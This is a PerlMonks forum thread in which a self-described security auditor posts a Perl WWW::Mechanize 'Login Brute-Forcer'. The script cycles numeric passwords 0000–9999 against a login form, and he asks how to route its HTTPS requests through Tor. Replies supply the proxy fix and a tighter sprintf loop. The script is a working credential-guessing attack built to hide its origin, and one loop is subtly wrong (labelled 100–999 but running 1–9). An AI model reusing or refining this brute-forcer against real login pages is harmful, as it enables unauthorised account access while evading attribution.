Beefy Boxes and Bandwidth Generously Provided by pair Networks
"be consistent"
 
PerlMonks  

Using Mech with HTTPS

by Juno (Initiate)
on Feb 05, 2009 at 17:43 UTC ( #741620=perlquestion: print w/ replies, xml ) Need Help??
Juno has asked for the wisdom of the Perl Monks concerning the following question:

Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation(or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999(I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, ie, no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...

PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW:Mechanize. HTTP connections appear to correctly filter through the proxy. Proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.

SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt:SLLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated. CODE:

#!/usr/bin/perl #Thanks to IBM for helping to create this - Bret Sweeden especially #NBTDOTM use WWW::Mechanize; use HTTP::Cookies; #$ENV{HTTPS_PROXY} = '127.0.0.1:8118'; #$ENV{HTTP_PROXY} = '127.0.0.1:8118'; #Determine the number of arguments the user has given us $NumArgs = $#ARGV + 1; if ($NumArgs == 0) { #Our user has not entered any information. Display help screen. header(); exit();} elsif ($NumArgs == 1) { #Our user has only entered some information. Display help screen. header(); exit();} if ($NumArgs == 2) { #Our user has entered enough for an attack. Begin! $host = $ARGV[0]; #Host is the first argument supplied $user = $ARGV[1]; #Username is the 2nd argument supplied #Display header print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- }; print "\nYour host is: $host"; print "\nYour username is: $user"; print "\n\nThe program will now try bruteforcing the host you selected +"; my $url = $host; my $username = $user; #1-9 for $i (1 .. 9) { print "\nTrying password 000$i..."; my $outfile = "000" . $i . ".htm"; my $password = "000" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https:/ +/127.0.0.1:8118/'); $mech->get($url); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #10-99 for $i (10 .. 99) { print "\nTrying password 00$i..."; my $outfile = "00" . $i . ".htm"; my $password = "00" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #100-999 for $i (1 .. 9) { print "\nTrying password 0$i..."; my $outfile = "0" . $i . ".htm"; my $password = "0" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #1000-9999 for $i (1000 .. 9999) { print "\nTrying password $i..."; my $outfile = $i . ".htm"; my $password = $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } } print "\n\nAudit complete!"; exit(); sub header{ print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- Usage: GHGbrute -[target site] -[user] Example: GHGbrute somesite.com -admin The program will attempt a numerical bruteforce to four places. }; }

Comment on Using Mech with HTTPS
Download Code
Re: Using Mech with HTTPS
by samtregar (Abbot) on Feb 05, 2009 at 18:06 UTC
    WWW::Mechanize has this to say about doing SSL through proxies:

    noproxy => [0|1] Turn off the automatic call to the LWP::UserAgent env_proxy function. This needs to be explicitly turned off if you're using Crypt::SSLeay t +o access a https site via a proxy server. Note: you still need to set yo +ur HTTPS_PROXY environment variable as appropriate.

    Did you try that? Just so you know, the nasty hackers you're trying to outsmart - they RTFM!

    -sam

Re: Using Mech with HTTPS
by AnomalousMonk (Abbot) on Feb 05, 2009 at 19:13 UTC
    This does not directly address your question, but I can suggest that, since the bodies of your loops seem very similar if not identical, there is a way to more concisely express the requirement to loop through all passwords from '0000' to '9999' using the sprintf built-in.
    >perl -wMstrict -e "for (0 .. 2, 103 .. 105, 9997 .. 9999) { my $password = sprintf qq{%04d}, $_; print qq{$password } } " 0000 0001 0002 0103 0104 0105 9997 9998 9999
    You may also, in future, wish to consider enclosing large chunks of code in <readmore> ... </readmore> tags; please see Writeup Formatting Tips for more info. (You can even update your post to do this now!)

    Update:   It's also a good idea to check the return status of any file or network I/O operations and die or warn as appropriate.

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: perlquestion [id://741620]
Approved by ikegami
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others making s'mores by the fire in the courtyard of the Monastery: (10)
As of 2014-09-18 19:09 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    How do you remember the number of days in each month?











    Results (121 votes), past polls